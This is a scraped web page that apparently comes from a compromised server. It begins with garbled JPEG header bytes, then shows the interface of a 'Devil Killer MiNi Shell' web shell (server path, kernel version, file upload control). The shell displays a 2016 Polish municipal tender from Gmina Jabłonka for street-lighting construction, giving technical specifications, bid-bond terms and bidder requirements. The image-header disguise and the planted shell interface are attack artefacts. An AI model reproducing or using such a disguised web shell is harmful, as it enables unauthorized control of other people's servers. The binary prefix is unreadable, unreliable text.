JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160322/29513-N-2016.html

<p class="kh_header"><b>Jabłonka: Rozbudowa oświetlenia ulicznego w miejscowości:  Jabłonka-Bory, Jabłonka, Lipnica Mała, Orawka, Podwilk, Zubrzyca Dolna</b><br>
<b>Numer ogłoszenia: 29513 - 2016; data zamieszczenia: 22.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jabłonka , ul. 3 Maja 1/206, 34-480 Jabłonka, woj. małopolskie, tel. 018 2611146, faks 018 2652468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jablonka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa oświetlenia ulicznego w miejscowości:  Jabłonka-Bory, Jabłonka, Lipnica Mała, Orawka, Podwilk, Zubrzyca Dolna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac jest następujący:
A. Wieś Jabłonka -Bory
Montaż 3 lamp oświetlenia ulicznego o mocy 70W. STTR nr 23(6326), słup nr 63 ul Staszica i słup nr 41 i 47 ul Zagrodowa  Przewód AsXSn 2x25mm2 o długości 200 mb. Warunki techniczne nr WP/012357/2016/009/R06 z dnia 22 luty 2016 rok wydane przez Tauron Dystrybucja w Nowym Targu.  
B. Jabłonka
1.Budowa oświetlenia ulicznego na ulicy B Prusa.
Sieć oświetlenia ulicznego przy ulicy B. Prusa realizuje się poprzez budowę wydzielonej sieci napowietrzno - kablowej oświetlenia ulicznego z zabudową opraw oświetleniowych. Planuje się posadowić 21 słupów oraz zabudowę 21 latarń oświetleniowych. Zasilanie projektowanego odcinka sieci oświetlenia ulicznego realizowane będzie z istniejącej stacji transformatorowej Jabłonka 2( 6109). Pomiar energii elektrycznej oraz sterowanie wykonane będzie z istniejącej szafki oświetlenia zabudowanej na w/w stacji trafo. Na projektowanym odcinku należy zamontować oprawy ze źródłami światła o mocy 70W typu NANO. Projektowana sieć oświetlenia ulicznego przy ulicy B. Prusa krzyżuje się z istniejącą siecią napowietrzną średniego napięcia 15KV w dwóch miejscach. Z uwagi na brak wymaganego obostrzenia 2o na sieci SN w tych miejscach projektowaną sieć oświetlenia ulicznego należy wykonać kablem ziemnym YAKXS 4x35mm2. Warunki techniczne nr WP/012349/2016/009/R06 z dnia 22 luty 2016 rok wydane przez Tauron Dystrybucja w Nowym Targu.
1.1. Dokumentacja: Zadanie należy wykonać zgodnie z projektem budowlanym 
sporządzonym przez firmę Biuro Projektów ELTOR-PROJEKT spółka z 
o.o. 30-720 Kraków ul. Saska 25. rysunki 4./9//2009 i 5/9/2009.
1.2. Dokument uprawniający do wykonania zadania-Decyzja nr 1202/09 z dnia   
02.12.2009 roku Starosty Nowotarskiego znak Ba-73510/1155-J/09
2.Montaż 21 lamp oświetlenia ulicznego o mocy 70W  w    
   następujących miejscach: 
-słup nr 114,115,116,117 ul Babiogórska, słup nr 105 ul Kępowa, słup nr 316 i 319 ul Dr Pawlaka, słup nr 125,123,122, 119 ul. Nawodnia,  STTR nr 17 Jabłonka(6320) . Lampy, sodowe o mocy 70W- szt 11 Przewód AsXSn 2x25mm2 o długości 450 mb. Warunki techniczne nr WP/012345/2016/009/R06 z dnia 22 luty 2016 rok wydane przez Tauron Dystrybucja w Nowym Targu,
-słup  nr 126 ul. B. Prusa, słup nr 221 ul. Kręta , słup nr 430 ul Krakowska, STTR nr 16 (6319) Jabłonka. Lampy sodowe o mocy 70W każda szt 3. Przewód AsXSn 2x25mm2 o długości 200 mb,       
-słup  nr .31B ul 1 Maja , STTR nr 1 (6108) Jabłonka . Lampa sodowa o 
 mocy 70W, szt 1 Warunki techniczne nr WP/012148/2016/009/R06 z dnia 19 
 luty 2016 rok wydane przez Tauron Dystrybucja w Nowym Targu,
-słup  nr 125 ul Na Skarpie, STTR nr 11(6682) Jabłonka.  Lampa sodowa o mocy 70W  szt 1.Przewód AsXSn 2x25mm2 o długości mb.200mb    
 Warunki techniczne nr WP/012047/2016//009/R06 z dnia 19 lutego 2016 roku, 
 wydane przez Tauron Dystrybucja w Nowym Targu,
-słup  nr 104 i 106 ul. Łąkowa STTR nr 10(6689) Jabłonka. Lampy 
 sodowe o mocy 70W-2 szt, Przewód AsXSn  2x25mm2 o długości 150 mb.     
 Warunki techniczne nr WP/012065/2016//009/R06 z dnia 19 lutego 2016 
 roku, wydane przez Tauron Dystrybucja w Nowym Targu,
- słup  nr 224/2 i 224/4 ul. Ks. Fr. Machaja STTR nr 14 (6313) Jabłonka 
 Lampy sodowe o mocy 70W-2 szt, Przewód AsXSn  2x25mm2 o długości 200 
  mb. Warunki techniczne nr WP/012305/2016/009/R06 z dnia 22 luty 2016 
  rok wydane przez Tauron Dystrybucja w Nowym Targu,
 - słup nr 106 ul. Leśna. Lampa sodowa o mocy 70W. STTR nr 
  21(6324) Warunki techniczne nr WP/012089/2016/009/R06 z dnia 19 luty    
  2016 rok wydane przez Tauron Dystrybucja w Nowym Targu.
Razem 21 lamp energooszczędnych sodowych o mocy 70W , przewód AsXSn  2x25mm2 1200mb.    
 C. Wieś Lipnica Mała.
1. Montaż 10 lamp oświetlenia ulicznego w następujących miejscach :
-słup o nr 204 i  209  STTR nr 13(6967)  Lipnica Mała. Lampy, sodowe o mocy    
 70W szt 2. Przewód AsXSn 2x25mm2 o długości 150mb. 
 Warunki techniczne nr WP/012167/2016//009/R06 z dnia 19 lutego 2016 
 roku wydane przez Tauron Dystrybucja w Nowym Targu,
-słup o nr 216,220,221,224  STTR nr 7 (6673) Lipnica Mała .
  Lampy sodowe o mocy 70W-4 szt, 
-słup o nr 338,339,i 343  STTR nr 4 (6670)Lipnica Mała. Lampy sodowe o     
 mocy 70W-3 szt, Przewód AsXSn  2x25mm2 o długości 200mb.     
 Warunki techniczne nr WP/012286/2016//009/R06 z dnia 22 lutego 2016 roku, 
 wydane przez Tauron Dystrybucja w Nowym Targu.
-słup o nr 139  STTR nr 6(6672) Lipnica Mała. Lampa sodowa o mocy   
 70W-1 szt, Warunki techniczne nr WP/012362/2016/009/R06 z    
 dnia 22 luty 2016 rok wydane przez Tauron Dystrybucja w Nowym Targu.
  Razem 10 lamp i ok. 350mb przewodu AsXSn 2x25mm2
D. Wieś  Orawka 
1. Budowa oświetlenia ulicznego  w Marchewkach. 
1.1.Opis techniczny. 
Od istniejącego słupa RN-10(obszar stacji Orawka 6(6275) wykonać odcinek linii AsXS 2x16mm2 wg Albumu Lnni to I i II na żerdziach Ż-10,E-10,5/2,3 i E-10,5/4,3 z oprawami SGS/SONT 70W. Oprawy montować na wysięgnikach Wo-1 Typ linii L1. Przyjęte naprężenia ?-37,5MPa. Projektowana linia nie znajduje się w obszarze osuwisk, strefy ochrony archeologicznej jest zgodna  z miejscowym planem zagospodarowania przestrzennego i nie powoduje wycinki drzew. Posadowienie słupów po ich wyznaczeniu przez uprawnionego geodetę zgodnie z mapą do celów projektowych uzgodniona  w Starostwie Powiatowym  
w Nowym Targu w dniu 10 sierpnia 2015 roku, która jest integralną częścią  projektu budowlanego wykonanego przez firmę Proreal. 
1.2. Dokument uprawniający do wykonania powyższego -zgłoszenie budowy sieci dokonane w Starostwie Powiatowym w Nowym Targu znak BA.6743.1.54.2015.KK-przyjęte bez sprzeciwu w dniu 7 grudnia 2015 roku. 
2. Budowa oświetlenia ulicznego w kierunku wyciągu narciarskiego.
Opis techniczny. 
Stan istniejący: za stan istniejący przyjęto linia napowietrzną 
oświetleniową nn zasilaną z szafki oświetleniowej zabudowanej na stacji 
trafo Orawka S2(6275),
Stan projektowany: Od istniejącego słupa RN-10(obszar stacji Orawka 2) 
wykonać odcinek linii AsXSn 2x25mm2, na żerdziach ŻN-10,E-105/2,3 i    
E-10,5/4,3 z oprawami SGS 102/SONT 100. Oprawy montować na 
wysięgnikach Wo-1 Typ linii L1. Przyjęte naprężenia ?-37,5MPA.           
Projektowana linia nie znajduje się w obszarze osuwisk, strefy ochrony 
archeologicznej i jest zgodna z miejscowym planem zagospodarowania 
przestrzennego, nie powoduje wycinki drzew. 
2.1. Dokument uprawniający do wykonania powyższego -decyzja nr 1096/2015 z dnia 30.12.2015 roku Starosty Nowotarskiego, znak BA.6740.11161.2015.RS. 
3.Montaż 2 lamp oświetlenia ulicznego na istniejących słupach - STTR nr 5(6274) zasilanie ze skrzyni na słupie nr 35 słup nr 35/2 .Warunki techniczne nr WP/012124/2016/009/R06 z dnia 24 lutego 2016 roku, wydane przez Tauron Dystrybucja w Nowym Targu. STTR nr 2 (6272) słup nr 35/2. Przewód AsXSn 2x25mm2 o długości 200mb. Razem :2 lampy energooszczędne sodowe o mocy 70W przewód AsXSn 2x25mm2 o długości 200mb    
E. Wieś Podwilk-
1. Budowa odcinka linii oświetlenia ulicznego w miejscowości Podwilk, 
    działka   Ew. 8575, 8574, obok drogi T-7. 
1 1.Stacja transformatorowa Podwilk 13(6910)- zasilanie projektowanego    odcinka oświetlenia ulicznego należy wykonać od istniejącego odcinka       
oświetlenia ulicznego wyprowadzonego ze  stacji S-6910.
Zabudować przewód oświetleniowy typu AsXSn 2x25mm2 na odcinku L1-
L15.Lampy i słupy , razem 14 szt. Słupy należy posadowić w 
otworach wierconych, a nie w rozkopie za chodnikiem, przy zachowaniu odległości min. 2,0m od krawędzi jezdni drogi krajowej, po wcześniejszym 
wyznaczeniu ich posadowienia przez uprawnionego geodetę, zgodnie z 
opracowanym projektem. Oprawa typu AMBAR 2 o mocy 
100W. Należy wystąpić do GDDKiA Rejon w Nowym Targu celem 
zawarcia porozumienia o warunkach prowadzenia robót w pasie drogowym 
drogi T-7 -pismo z dnia 2 września 2010 roku GDDKiA w Krakowie. 
1.2 Zadanie należy wykonać zgodnie z projektem budowlanym sporządzonym 
przez firmę Zakład Usług Projektowo-Produkcyjno-Handlowy, 32-050 
Skawina  ul. Bukowska 6/32. rysunek nr 1.słupy od L2 do L15.
1.3. Dokument uprawniający do wykonania zadania-Zaświadczenie Wojewody 
Małopolskiego z dnia 5 października 2010 roku, znak WI.II.7113-1-133-10 
w sprawie nie wniesienia sprzeciwu w sprawie zgłoszenia zamiaru 
wykonania robót budowlanych pn. Budowa odcinka linii oświetlenia 
ulicznego w miejscowości Podwilk, działka   Ew. 8575, 8574, obok drogi T-7.  
F. Wieś Zubrzyca Dolna
1. Budowa sieci oświetlenia ulicznego, odcinek nr IV- od bazy SKR po 
most K. Trójcy.  Stacja transformatorowa nr 5(6875) Zubrzyca Dolna. 
Zasilanie projektowanej linii oświetlenia ulicznego będzie realizowane z istniejącego układu pomiarowego znajdującego się w stacji 
transformatorowej nr 5(6875) Zubrzyca Dolna. Na odcinku istniejąca stacja transformatorowa- istniejący słup 4/Or-10/ŻN projektowana linia oświetlenia ulicznego prowadzona będzie wspólnie z istniejącą linią nn0,4KV-pod przewodami. Na projektowanym odcinku nr IV zaprojektowano   
zabudowę 25 opraw NANO ze źródłami światła SONT -T Plus o mocy   
70W, w tym 4 na słupach istniejących i 21 na słupach do zabudowy. 
Odcinek IV, rysunek nr 8/8/2009,9/8/2009 i 10/8/2009 projektu wykonawczego.
1.2. Dokumentacja:
Projekt wykonawczy wykonany przez firmę ELTOR-Projekt spółka z    
o.o 30-720 Kraków ul. Saska 25,na wykonanie powyższych prac.
1.3. Dokument prawny upoważniający do wykonania zadania: 
Decyzja nr 1084/08  z 21 października  2009 roku , znak     
BA73510/1084/J/09  Starosty Nowotarskiego.
Warunki techniczne nr WP/012274/2016/009/R06 z dnia 22 luty 2016 rok 
wydane przez Tauron Dystrybucja w Nowym Targu.  
2. Montaż 11 lamp oświetlenia ulicznego
-słup o nr 306,308 i dwa wirowane bez numeru obok budynku o nr 55A i 54-rola Sadłowa, słup nr 326 i 325 STTR nr 2(6303) Zubrzyca Dolna. Lampa sodowa o mocy 70W szt 7 Przewód AsXSn  2x25mm2 o długości 650mb, 
-słup o nr  318 i 314  STTR nr 7 (6681) Zubrzyca Górna. Lampy sodowe o mocy  70W, Przewód AsXSn  2x25mm2 o długości 250 mb.  Warunki techniczne nr WP/012484/2016/009/R06 z dnia 22 luty 2016 rok wydane przez Tauron Dystrybucja w Nowym Targu.
 -słup o nr 430 i 428 (Puchałówka) Stacja transformatorowa nr 5(6875) Zubrzyca Dolna. Lampy sodowe o mocy  70W, Przewód AsXSn  2x25mm2 o długości 500 mb. Warunki techniczne nr WP/012274/2016/009/R06 z dnia 22 luty 2016 rok  wydane przez Tauron Dystrybucja w Nowym Targu.
Uwaga:
Na całość wykonanych prac należy wykonać dokumentację powykonawczą. Dokumentacja powykonawcza winna zawierać:   protokoły pomiarów uziemień, protokoły badania oporności instalacji, protokoły montażu ustojów w  miejscach przewidzianych do ich montażu w dokumentacji projektowej, dokumentację geodezyjną powykonawczą dla zadania wyszczególnionego w  pkt B ust 1. pkt D ust 1,pkt D ust 2, pkt E ust 1, pkt F ust 1 Dokonać zgłoszenia całości wykonanych prac, na obowiązujących drukach, w Rejonie Energetycznym w Nowym Targu. Wypełnić oświadczenia kierownika budowy stwierdzające sporządzenie planu bezpieczeństwa i ochrony zdrowia oraz przyjęcie obowiązku kierowania budową na drukach obowiązujących w Powiatowym Inspektoracie Nadzoru Budowlanego w Nowym Targu(dla pkt B ust 1 ,pkt D ust 1, pkt  D ust 2 i pkt F ust 1). Na prace realizowane obok drogi T-7 w miejscowości Podwilk należy uzyskać zgodę w GDDKiA Rejon w Nowym Targu. Na całość prac należy dokonać niezbędnych wyłączeń po ich opłaceniu przez wykonawcę w Rejonie Energetycznym w Nowym Targu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.61.00-6, 45.31.61.10-9, 45.31.43.00-4, 45.23.22.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść   wadium w wysokości 4500,00 zł (słownie złotych: cztery tysiące, pięćset złotych 00/100) na zasadach oraz w jednej z form określonych w SIWZ.
2.	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
3.	Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego: Bank BS Jabłonka Nr 74 8798 0002 0000 0000 0026 0014 z dopiskiem wadium przetargowe na: Rozbudowa oświetlenia ulicznego w miejscowości: Jabłonka-Bory, Jabłonka, Lipnica Mała, Orawka, Podwilk, Zubrzyca Dolna.
4.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania rachunku Zamawiającego.
5.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Gminy Jabłonka, ul. 3 Maja 1 34-480 Jabłonka - kasa UG w pok. 105 lub dołączyć do oferty. Oryginał gwarancji/poręczenia powinien być umieszczony w ofercie w sposób umożliwiający jego zwrot zgodnie z ustawą.
6.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.
7.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 06.04.2016 roku do godz. 12:00. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
8.	Zasady zwrotu wadium oraz jego utraty określa art. 46 ust. 1-5 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeśli wykonał w ciągu ostatnich 5 lat przed dniem składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną odpowiadającą swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia. Za robotę budowlaną odpowiadającą swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia, Zamawiający uważać będzie roboty budowlane polegające na budowie, przebudowie, rozbudowie lub remoncie oświetlenia ulicznego o wartości minimum 100 000 zł brutto. Wykonawca musi również posiadać dowody dotyczące najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; -  zał. nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeżeli Wykonawcy wykażą się dysponowaniem, osobami odpowiedzialnymi za kierowanie robotami budowlanymi w specjalności:
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, która posiada co najmniej 3 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy;
odpowiadające wymaganiom określonym w ustawie Prawo budowlane, lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. W przypadku gdy wykonawca dysponuje personelem kierowniczym spoza terytorium RP osoby te muszą: - posiadać wykształcenie i kwalifikacje wymagane do świadczenia usług we wskazanych wyżej branżach budowlanych, - posiadać decyzję o uznaniu kwalifikacji zawodowych we wskazanych wyżej branżach budowlanych zgodnie z ustawą z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych w państwach członkowskich Unii Europejskiej lub posiadać prawo do świadczenia usług transgranicznych.- zał. nr 5 do SIWZ.
 (dla Wykonawcy z poza terytorium RP uprawnienia odpowiednie w danym kraju).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

